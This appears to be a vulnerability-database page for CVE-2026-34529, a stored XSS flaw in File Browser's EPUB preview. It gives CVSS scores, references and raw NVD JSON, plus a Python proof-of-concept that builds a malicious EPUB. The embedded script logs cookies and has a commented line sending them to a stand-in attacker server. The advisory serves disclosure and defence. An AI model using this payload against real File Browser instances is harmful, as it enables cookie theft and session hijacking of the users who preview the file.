CVE-2026-34529

Description

File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to version 2.62.2, the EPUB preview function in File Browser is vulnerable to Stored Cross-Site Scripting (XSS). JavaScript embedded in a crafted EPUB file executes in the victim's browser when they preview the file. This issue has been patched in version 2.62.2.

CVSS Details

CVSS Score

7.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:* - VULNERABLE

File Browser < 2.62.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# Proof of Concept (PoC) generator for CVE-2026-34529
# This script creates a malicious EPUB file containing XSS payload.

import zipfile
import os

def create_malicious_epub(filename='malicious.epub'):
    # Create a temporary directory structure for the EPUB
    os.makedirs('OEBPS', exist_ok=True)
    
    # 1. Create the mimetype file (must be uncompressed)
    with open('mimetype', 'w') as f:
        f.write('application/epub+zip')
    
    # 2. Create container.xml
    os.makedirs('META-INF', exist_ok=True)
    with open('META-INF/container.xml', 'w') as f:
        f.write('''<?xml version="1.0"?>
<container version="1.0" xmlns="urn:oasis:names:tc:opendocument:xmlns:container">
  <rootfiles>
    <rootfile full-path="OEBPS/content.xhtml" media-type="application/xhtml+xml"/>
  </rootfiles>
</container>''')
    
    # 3. Create the malicious XHTML content
    # The JavaScript payload executes when the file is previewed
    xss_payload = '''<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>XSS PoC</title></head>
<body>
    <h1>Normal EPUB Content</h1>
    <script>
        // Malicious code execution
        alert('CVE-2026-34529 Exploited!');
        console.log('Cookie: ' + document.cookie);
        // fetch('http://attacker-server/?c=' + document.cookie);
    </script>
</body>
</html>'''
    
    with open('OEBPS/content.xhtml', 'w') as f:
        f.write(xss_payload)
    
    # 4. Zip everything into an EPUB file
    with zipfile.ZipFile(filename, 'w') as zf:
        zf.write('mimetype', compress_type=zipfile.ZIP_STORED)
        zf.write('META-INF/container.xml')
        zf.write('OEBPS/content.xhtml')
    
    print(f"[+] Malicious EPUB file created: {filename}")
    print("[+] Upload this file to File Browser and preview it to trigger the XSS.")
    
    # Cleanup
    os.remove('mimetype')
    os.remove('META-INF/container.xml')
    os.remove('OEBPS/content.xhtml')
    os.rmdir('OEBPS')
    os.rmdir('META-INF')

if __name__ == "__main__":
    create_malicious_epub()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34529
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34529
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34529/
[4] VulDB https://vuldb.com/cve/CVE-2026-34529
[5] https://github.com/filebrowser/filebrowser/releases/tag/v2.62.2
[6] https://github.com/filebrowser/filebrowser/security/advisories/GHSA-5vpr-4fgw-f69h

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34529", "sourceIdentifier": "[email protected]", "published": "2026-04-01T21:17:00.830", "lastModified": "2026-04-06T20:39:47.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to version 2.62.2, the EPUB preview function in File Browser is vulnerable to Stored Cross-Site Scripting (XSS). JavaScript embedded in a crafted EPUB file executes in the victim's browser when they preview the file. This issue has been patched in version 2.62.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.62.2", "matchCriteriaId": "A22210FE-83DA-49B9-A015-543942FE731F"}]}]}], "references": [{"url": "https://github.com/filebrowser/filebrowser/releases/tag/v2.62.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-5vpr-4fgw-f69h", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}